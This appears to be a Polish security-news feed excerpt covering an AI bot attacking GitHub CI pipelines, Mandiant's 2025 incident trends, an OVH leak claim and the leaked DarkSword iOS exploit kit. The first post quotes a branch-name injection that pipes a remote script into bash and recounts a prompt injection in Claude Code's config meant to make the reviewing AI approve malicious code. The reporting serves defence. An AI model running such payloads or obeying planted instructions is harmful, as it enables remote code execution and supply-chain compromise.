<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-600x467.jpg" alt="" width="600" height="467" class="aligncenter size-large wp-image-26957" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-600x467.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-321x250.jpg 321w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-768x598.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-1536x1196.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw.jpg 1682w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Pozostałe techniki, to m.in. wstrzykiwanie złośliwego kodu do skryptów (np. dodanie funkcji &#8220;<a href="https://github.com/avelino/awesome-go/pull/6069" target="_blank">init()</a>&#8221; w języku Go), wstrzykiwanie poleceń powłoki (bash) poprzez specjalnie spreparowane nazwy gałęzi (<span class="code">dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash)</span>) lub nazwy plików, zawierające zakodowane w Base64 komendy. </p>
<p>Najciekawszym atakiem był <strong>AI Prompt Injection</strong> &#8212; bot podmienił plik konfiguracyjny projektu, z którego korzystało narzędzie &#8220;Claude Code&#8221; (jako AI do code review), instruując swojego &#8220;bliźniaka&#8221;, by sam zatwierdziła złośliwy kod i przepchnął zmiany! Piękne, ale to się akurat nie udało, bo na szczęście, asystent zachował się wzorowo &#8212; zidentyfikował manipulację w swoim pliku konfiguracyjnym, odmówił wykonania złośliwych operacji i opublikował komentarz ostrzegający programistów: &#8220;Do Not Merge&#8221;.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-600x351.jpg" alt="" width="600" height="351" class="aligncenter size-large wp-image-26961" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-600x351.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-350x205.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-768x449.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-1536x898.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1.jpg 1600w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-600x367.jpg" alt="" width="600" height="367" class="aligncenter size-large wp-image-26958" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-600x367.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-350x214.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-768x470.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1536x940.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw.jpg 1600w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Przejęcie Trivy i kradzież tokenów</h3>
<p>Najpoważniejsze konsekwencje poniósł projekt Trivy (Aqua Security), który &#8212; jak na ironię &#8212; jest skanerem podatności. Bot z powodzeniem wykradł Personal Access Token o szerokich uprawnieniach i użył go, aby:</p>
<ul>
<li>Przekształcić repozytorium na prywatne i zmienić jego nazwę.</li>
<li>Skasować wszystkie wydania (GitHub Releases) z kilku lat.</li>
<li>Wypuścić podejrzany artefakt jako rozszerzenie Trivy w sklepie Open VSIX (czyli atak na programistów przez &#8220;łańcuch dostaw&#8221;).</li>
<li>Zostawić w pliku README.md ironiczną wiadomość.</li>
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-350x209.jpg" alt="" width="350" height="209" class="aligncenter size-medium wp-image-26962" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-350x209.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-600x358.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-768x458.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-1536x916.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2.jpg 1690w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Używam Github Actions, co robić, jak żyć?</h3>
<p>Jeśli zostawicie gdzieś niezabezpieczony workflow w GitHub Actions, prędzej czy później odwiedzi go &#8220;autonomiczny badacz&#8221; i zrobi Wam jesień średniowiecza w repozytorium. Dlatego</p>
<ul>
<li>Zawsze stosujcie zasadę najmniejszych uprawnień dla tokenów. GITHUB_TOKEN powinien mieć tylko uprawnienia do odczytu (contents: read), chyba że zapis jest absolutnie konieczny. </li>
<li>Nigdy nie używajcie akcji &#8220;actions/checkout&#8221; z niezaufanym kodem w połączeniu z &#8220;pull_request_target&#8221;.</li>
<li>Zablokujcie też nieautoryzowany ruch sieciowy z maszyn wirtualnych CI/CD (np. wychodzące żądania curl), co zapobiegnie pobraniu złośliwego payloadu lub wysłania w siną dal wykradzionego tokena.</li>
</ul>
<h3>AI atakuje AI, czyli nowa rzeczywistość</h3>
<p>Historia bota &#8220;hackerbot-claw&#8221; to dowód na to, że zmienia się krajobraz zagrożeń. Wkroczyliśmy w erę, w której agenty AI atakują inne agenty AI. Szczególnie ciekawy (i przerażający) jest tu atak za pomocą wstrzykiwania promptu (Prompt Injection) do pliku konfiguracyjnego.</p>
<p>Rozważamy cyk webinarów na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej &#8212; jak cykl wystartuje, wyślemy Ci powiadomienie:</p>
<blockquote><p>
<script src='https://www.google.com/recaptcha/api.js'></script></p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" style="margin-left:auto; margin-right:auto; width: 300px">
<label for="email" style="color:gray">Wpisz adres e-mail:</label><br />
<input type="email" name="email" id="email" size="35"/></p>
<p><label for="email" style="color:gray">Rozwiąż Captcha:</label></p>
<p class="g-recaptcha" data-sitekey="6LeoxuQUAAAAAA5HroywxIlzmrv1K2Ciq0BZKBZb">
<div style="display:none;">
<label for="hp">HP</label><input type="text" name="hp" id="hp"/></div>
<p><input type="hidden" name="list" value="T2Vqs9qFpXQZfhm7VWOOcQ"/><input type="hidden" name="subform" value="yes"/><input type="submit" name="submit" id="submit" value=" Poinformuj mnie o starcie! "/><br />
</form>
<p><small style="color:gray">Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij <a href="https://niebezpiecznik.pl/regulamin-sklep/#rodo">tutaj</a>.</small>
</p></blockquote>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/#comments" rel="replies" thr:count="6" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/feed/atom/" rel="replies" thr:count="6" type="application/atom+xml"/>
			<thr:total>6</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[To nie AI jest największym zagrożeniem. Czyli raport opisujący incydenty z 2025 roku]]></title>
		<link href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26947</id>
		<updated>2026-03-24T16:19:05Z</updated>
		<published>2026-03-24T16:15:49Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Mandiant"/><category scheme="https://niebezpiecznik.pl" term="raporty"/><category scheme="https://niebezpiecznik.pl" term="sieci"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Mandiant opublikował swój coroczny raport M-Trends. Raport, wbrew oczekiwaniom niektórych, nie stoi pod znakiem &#8220;AI niszczy świat&#8221;. Wnioski są dużo bardziej prozaiczne, a jednocześnie przerażające. AI faktycznie pomaga atakującym (głównie w socjotechnice i pisaniu malware&#8217;u omijającego detekcję), ale przytłaczająca większość udanych włamań to wciąż wynik błędów ludzkich i systemowych. Oto najciekawsze smaczki, które warto znać [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/"><![CDATA[<p>Mandiant opublikował swój coroczny <a href="https://www.gstatic.com/security-marketing/m-trends-2026-en.pdf" target="_blank">raport</a> M-Trends. Raport, wbrew oczekiwaniom niektórych, nie stoi pod znakiem &#8220;AI niszczy świat&#8221;. Wnioski są dużo bardziej prozaiczne, a jednocześnie przerażające. AI faktycznie pomaga atakującym (głównie w socjotechnice i pisaniu malware&#8217;u omijającego detekcję), ale przytłaczająca większość udanych włamań to wciąż wynik błędów ludzkich i systemowych.<span id="more-26947"></span></p>
<p>Oto najciekawsze smaczki, które warto znać z perspektywy Blue Teamów, Red Teamów i zwykłych adminów (rymy przypadkowe):</p>
<h3>Phishing e-mailowy wypierany przez vishing, czyli ataki socjotechniczne przez telefon</h3>
<p>To jedna z największych zmian w statystykach. Od sześciu lat wektorem nr 1 pozostaje wykorzystanie exploitów (32%). W 2025r. najczęściej dziurawiono SAP NetWeaver, Oracle E-Business Suite oraz Microsoft SharePoint. Ale uwaga: wektorem nr 2 nie jest już klasyczny phishing e-mailowy (spadek z 14% na zaledwie 6%). Na jego miejsce z wynikiem 11% wskoczył vishing oraz socjotechnika przez komunikatory. Kopsniesz mi 200 ziko blikiem, oddam jutro.</p>
<p>Na trzecim miejscu (10%) jest atak na łańcuch dostaw lub oprogramowanie firm trzecich (w tym SaaS).</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-600x359.jpg" alt="" width="600" height="359" class="aligncenter size-large wp-image-26951" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-600x359.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-350x210.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-768x460.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku.jpg 1152w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Szyfrowanie startuje po 30 sekundach od ataku</h3>
<p>Cyberjełopy się wyspecjalizowały. Grupy zajmujące się uzyskiwaniem początkowego dostępu (Initial Access Brokers) masowo infekują ofiary za pomocą np. złośliwych reklam (malvertising) lub fałszywych komunikatów w przeglądarce &#8212; popularny motyw <a href="https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/" target="_blank">ClickFix/InstallFix</a>, który jako chyba pierwsi zauważyliśmy i opisaliśmy we wrześniu 2024. Chodzi o wyskakujące okienko namawiające do wklejenia np. kodu do konsoli PowerShell.</p>
<p>Kiedyś IAB wystawiał uzyskane dostępy na grupach lub forach i czekał na kupca (np. operatora ransomware). W 2022r. mediana czasu od infekcji do przekazania dostępu wynosiła 8 godzin. W 2025 roku ten czas spadł do&#8230; 22 sekund. Tak, proces został zautomatyzowany. Malware (np. FAKEUPDATES) od razu pobiera i instaluje backdoora docelowej grupy (np. RansomHub). Z punktu widzenia SOC-u oznacza to, że alert o &#8220;nisko-priorytetowym&#8221; malware z przeglądarki musi być traktowany jako krytyczny incydent P1, bo już po kilku minutach napastnik zacząć może lateral movement.</p>
<p>Tu ciekawostka: Grupy APT wbijają się na brzegowe urządzenia sieciowe (wykorzystując 0-daye lub luki n-day), zakładają na nich własne konta, uruchamiają SSH na niestandardowych portach i puszczają sniffery pakietów, aby wyłapywać hasła latające po sieci w cleartext&#8217;cie.</p>
<h3>Ransomware to już nie tylko szyfrowanie. To &#8220;Recovery Denial&#8221;</h3>
<p>Złote czasy, gdy ransomware tylko szyfrował pliki, a ofiara po prostu odtwarzała je z backupu, minęły bezpowrotnie &#8212; o tym też na Niebezpieczniku <a href="https://niebezpiecznik.pl/post/co-robic-po-wycieku-danych/" target="_blank">mogliście usłyszeć wielokrotnie</a>. Głównym celem grup RaaS (Ransomware-as-a-Service) stała się teraz infrastruktura backupowa. Napastnicy wiedzą, że jeśli zniszczą kopie zapasowe to ofiara będzie bardziej skora do zapłaty. Kradną poświadczenia do serwerów backupu, hasła do macierzy NAS czy chmurowych bucketów i trwale kasują kopie zapasowe albo szyfrują to, co zostało. Pozyskują też całą bazę ntds.dit z kontrolerów domeny (często robiąc snapshoty maszyn wirtualnych z poziomu hypervisora, omijając w ten sposób EDR-y na hostach), korzystajż z GPO lub Microsoft Endpoint Manager aby pchnąć ransomware od razu, jednocześnie na tysiące stacji roboczych. Czasem, EDR może to zablokować, więc atakujący jeśli mogą, to szyfrują pliki .vmdk bezpośrednio na datastorze hypervisora.</p>
<p>Zarówno zaawansowane grupy szpiegowskie (np. z Chin, jak UNC5807 czy UNC5221), jak i cyberprzestępcy często celują w urządzenia, na których nie da się zainstalować agenta EDR. Chodzi np. o firewalle, routery, VPN oraz hypervisory (VMware ESXi, vCenter). Hypervisor wykorzystują jako kryjówkę. Zamiast atakować wirtualki, napastnik przejmuje HV i stawia na nim własną, &#8220;niewidzialną&#8221; (zarządzaną przez emulator QEMU) maszynę wirtualną. Nie widać jej w konsoli vCenter, nie skanują jej firmowe antywirusy, a służy ona do tunelowania ruchu z C2.</p>
<h3>OAuth &gt; Hasła</h3>
<p>Zabezpieczasz chmurę i masz MFA? Świetnie. A co z integracjami? Atakujący (np. APT29 czy grupy finansowe) masowo atakują stacje robocze developerów, by wykradać tokeny. Skanują też repozytoria kodu w poszukiwaniu na twardo zaszytych kluczy API. Kradzież tokenów sesyjnych (cookies) oraz refresh tokenów OAuth to również często wykorzystywane techniki. Pozwala to na całkowite ominięcie MFA. Dodatkowo, przestępcy żerują na źle zescope&#8217;owanych uprawnieniach dla aplikacji firm trzecich (np. integracja, która ma tylko czytać logi, dostaje uprawnienia pozwalające na kasowanie bucketów).</p>
<h3>Ten kolega jest też kolegą Kima!</h3>
<p>Trend, o którym <a href="https://niebezpiecznik.pl/post/jak-atakowane-sa-polskie-firmy-posluchajcie-historii-tomasza/" target="_blank">pisaliśmy już wielokrotnie na Niebezpieczniku</a>, wciąż rośnie. Północnokoreańscy &#8220;specjaliści IT&#8221; masowo zatrudniają się w zachodnich firmach pod fałszywymi tożsamościami. W 2025 roku stanowili oni aż 6% wszystkich incydentów wewnętrznych. Co ciekawe, ich mediana czasu przebywania w sieci wynosiła aż 122 dni. Główny cel to pobieranie zachodniej pensji i transferowanie jej reżimowi, ale Mandiant odnotował też przypadki przekupywania innych pracowników (lub podwykonawców), aby ci udostępnili im swoje korporacyjne poświadczenia, co prowadziło do kradzieży danych i prób wymuszeń.</p>
<h3>Co robić, jak żyć w 2026?</h3>
<p>Raport Mandianta mówi jasno: koncepcja obrony oparta wyłącznie na blokowaniu to przeszłość. Należy przejść na model &#8220;Active Resilience&#8221;. Czyli?</p>
<ul>
<li>Chroń Tier-0 i hypervisory. vCenter i serwery backupu nie mogą być wpięte do tego samego Active Directory, co reszta firmy. Złamanie jednego admina domenowego nie może oznaczać padnięcia środowiska wirtualnego i backupów. </li>
<li>MFA na wszystko i ograniczenie OAuth. Nie pozwalaj userom na dowolne klikanie &#8220;Zezwól&#8221; dla aplikacji firm trzecich w Google Workspace czy MS365. Zabezpieczaj logowania adminów <a href="https://www.youtube.com/watch?v=Zr0PffkN09w" target="_blank">kluczami FIDO2</a>.</li>
<li>No i loguj to, czego EDR nie widzi, zbieraj i analizuj logi z vCenter, firewalli i switchy. Szukaj w nich tworzenia nowych ról, snapshotów czy dziwnych logowań SSH. Jak to robić, możesz dowiedzieć się z naszego ostatniego webinara &#8220;<a href="https://sklep.niebezpiecznik.pl/opis/36" target="_blank">SOC w Praktyce</a>&#8220;.</li>
<li>Reaguj natychmiast na &#8220;błahe&#8221; alerty. Jeśli antywirus ubije skrypt z przeglądarki (np. malware &#8220;Kliknij tu, aby naprawić błąd wtyczki&#8221;), nie zamykaj zgłoszenia &#8212; sprawdź dokładnie, czy ułamek sekundy wcześniej nie poszło połączenie zwrotne (reverse shell).</li>
</ul>
<p>A jeśli jesteś administratorem, który dba o bezpieczeństwo firmowej sieci, wpadnij na nasze szkolenie pt. &#8220;<a href="https://niebezpiecznik.pl/net" target="_blank">Bezpieczeństwo Sieci Komputerowych (testy penetracyjne)</a>&#8221; &#8212; przez <strong>3 dni</strong> w specjalnym labie uczymy jak przejmowane są sieci i jak wytropić atakującego. Minimum teorii, maksimum praktyki. Szkolenie kończy się, kiedy masz uprawnienia administratora na każdej maszynie <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f643.png" alt="🙃" class="wp-smiley" style="height: 1em; max-height: 1em;" /> A po drodze uczysz się technik, z których korzystają atakujący, co pozwoli Ci szybciej ich namierzyć w swojej infrastrukturze. Poniżej najbliższe terminy tego szkolenia:</p>
<div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>15-17 kwietnia 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 27 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fxy">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 3 kwietnia)<br>
                        4444 PLN netto (od 4 kwietnia)
                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>13-15 maja 2026</strong>r. — zostało <strong>5 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 26 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gfc">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 3 kwietnia)<br>
                        4444 PLN netto (od 4 kwietnia)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 10 kwietnia)<br>
                        4444 PLN netto (od 11 kwietnia)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 02 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 10 kwietnia)<br>
                        4444 PLN netto (od 11 kwietnia)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 13 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 17 kwietnia)<br>
                        4444 PLN netto (od 18 kwietnia)
                        </ul></div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Twierdzi, że wykradł dane klientów OVH. Szef OVH zaprzecza]]></title>
		<link href="https://niebezpiecznik.pl/post/ovh-hack-leak/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26941</id>
		<updated>2026-03-24T15:24:23Z</updated>
		<published>2026-03-24T15:24:23Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="OVH"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/ovh-hack-leak/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Podsyłacie nam informacje o tym, że na jednym z cyberprzestępczych kanałów na Telegramie pojawiło się ogłoszenie sprzedaży bazy danych OVH, która miała zostać rzekomo wykradziona z &#8220;OVH parent&#8217;s account&#8221; (cokolwiek przez to rozumie autor). W pozyskanych danych ma rzekomo być: 1.6 milionów rekordów dotyczących "świeżych klientów" OVH 5.9 milionów informacji dot. hostowanych stron Zwracamy jednak [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/ovh-hack-leak/"><![CDATA[<p>Podsyłacie nam informacje o tym, że na jednym z cyberprzestępczych kanałów na Telegramie pojawiło się ogłoszenie sprzedaży bazy danych OVH, która miała zostać rzekomo wykradziona z &#8220;OVH parent&#8217;s account&#8221; (cokolwiek przez to rozumie autor). W pozyskanych danych ma rzekomo być:<span id="more-26941"></span></p>
<p><code>1.6 milionów rekordów dotyczących "świeżych klientów" OVH<br />
5.9 milionów informacji dot. hostowanych stron</code></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-600x533.jpg" alt="" width="600" height="533" class="aligncenter size-large wp-image-26946" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-600x533.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-281x250.jpg 281w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked-768x682.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/ovh-hacked.jpg 1398w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Zwracamy jednak uwagę, że Octave Klaba, właściciel OVH <a href="https://x.com/olesovhcom/status/2036316608486875292" target="_blank">zdementował</a> że podane przez sprzedawcę przykładowe dane należą do klienta OVH.</p>
<p>A zatem, bez paniki. Ogłoszenie, jak wiele <a href="https://niebezpiecznik.pl/post/wyciek-danych-klientow-empiku/" target="_blank">innych</a>, może być próbą oszustwa (wyłudzenia pieniędzy od chętnego kupca). </p>
<p>&#8230;ale może to też dobry pomysł, aby &#8212; jeśli jesteście klientami nie tylko OVH &#8212; sprawdzić, czy przypadkiem hasła i inne dane logowania do Waszych hostingów nie są zbieżne danymi logowania do innych miejsc? Albo czy na hostingu nie znajduje się więcej niż powinno. Tak na przyszłość&#8230;</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/ovh-hack-leak/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/ovh-hack-leak/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Od dziś każdy może prosto zhackować niezaktualizowanego iPhona i iPada]]></title>
		<link href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26934</id>
		<updated>2026-03-24T14:13:55Z</updated>
		<published>2026-03-24T14:13:55Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="DarkSword"/><category scheme="https://niebezpiecznik.pl" term="exploit"/><category scheme="https://niebezpiecznik.pl" term="iOS"/><category scheme="https://niebezpiecznik.pl" term="iPhone"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W ubiegłym tygodniu badacze cyberbezpieczeństwa ujawnili sporych rozmiarów kampanię wymierzoną w użytkowników niezaktualizowanych urządzeń Apple. Ataki realizowano za pomocą narzędzia DarkSword, które dotychczas było w rękach zaawansowanych grup przestępczych. Ale właśnie wyciekło do sieci i każdy może je pobrać z GitHuba. Skopiuj, wklej, atakuj DarkSword to zestaw exploitów na iOS, który jest dość prosty w [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/"><![CDATA[<p>W ubiegłym tygodniu badacze cyberbezpieczeństwa ujawnili sporych rozmiarów kampanię wymierzoną w użytkowników niezaktualizowanych urządzeń Apple. Ataki realizowano za pomocą narzędzia DarkSword, które dotychczas było w rękach zaawansowanych grup przestępczych. Ale właśnie wyciekło do sieci i każdy może je pobrać z GitHuba.<span id="more-26934"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-600x353.jpg" alt="" width="600" height="353" class="aligncenter size-large wp-image-26936" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-600x353.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-350x206.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-768x452.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-1536x905.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword-iphone-exploit-2048x1206.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Skopiuj, wklej, atakuj</h3>
<p>DarkSword to zestaw exploitów na iOS, który jest dość prosty w użyciu (opublikowane pliki to w zasadzie tylko HTML i JavaScript). Oznacza to, że prawie każdy może je skopiować, wrzucić na swój serwer i w kilka minut rozpocząć ataki na użytkowników iPhonów i iPadów. Nie jest tu wymagana żadna zaawansowana wiedza o strukturze systemu iOS. </p>
<h3>Rosyjskie służby i ukraińskie serwery</h3>
<p>DarkSword to nie jest amatorka. Według analityków <a href="https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain" target="_blank">Google</a> oraz <a href="https://www.lookout.com/blog/darksword" target="_blank">Lookout</a>, narzędzie to było wcześniej wykorzystywane przez rosyjskich hakerów rządowych (UNC6353) do inwigilowania celów w Ukrainie. Co ciekawe, w kodzie źródłowym, który trafił do sieci, są fragmenty odpowiedzialne za przesyłanie skradzionych danych do popularnego ukraińskiego sklepu odzieżowego. Najprawdopodobniej atakujący przejęli wcześniej tę stronę, aby używać jej jako tzw. serwera C2 (Command and Control). </p>
<p>Warto dodać, że to już kolejny taki incydent w tym miesiącu. Niedawno głośno było o exploitpacku Coruna, stworzonym przez firmę L3Harris dla amerykańskiego rządu.</p>
<h3>Co groźnego potrafi DarkSword?</h3>
<p>DarkSword po udanym ataku po cichu wykrada z urządzenia: </p>
<ul>
kontakty,<br />
wiadomości,<br />
historię połączeń<br />
zawartość systemowego pęku kluczy (iOS Keychain), w którym przechowywane są m.in.<strong> hasła do Wi-Fi i innych usług</strong>. </ul>
<p>To nie jest narzędzie działające jak Pegasus (długotrwała inwigilacja). Raczej toolkit do szybkiego wejścia, kradzieży i wyjścia. Co ciekawe ma też funkcje kradzieży kryptowalut.</p>
<h3>Kogo dotyczą te ataki?</h3>
<p>DarkSword atakuje systemy <strong>iOS w wersji 18</strong> bez włączonego mechanizmu Lockdown. Według danych Apple, około 25% użytkowników wciąż korzysta z iOS 18 lub starszych wersji systemu. Oznacza to setki milionów urządzeń, które są &#8220;na tacy&#8221; dla każdego, kto pobierze kod z GitHuba. </p>
